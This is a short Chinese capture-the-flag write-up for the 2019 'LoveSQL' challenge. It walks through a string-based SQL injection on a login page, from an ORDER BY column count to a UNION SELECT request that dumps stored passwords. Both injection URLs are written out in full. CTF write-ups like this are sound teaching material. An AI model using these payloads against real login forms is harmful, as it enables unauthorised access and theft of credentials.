[极客大挑战 2019]LoveSQL write-up
(0)

打开发现界面还是和之前的一样

输入1' 发现报错,判断为字符型注入

首先order by判断字段数
/check.php?username=1%27++order+by+4+%23&password=1212

4报错,3回显正常,判断字段数为3

UNION注入爆数据库名,爆表名,爆列名,爆数据,最终得到flag。

check.php?username=10000%27++union+select+1%2C2%2Cgroup_concat%28password%29+from+l0ve1ysq1+%23&password=1212

本文为作者silent666发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论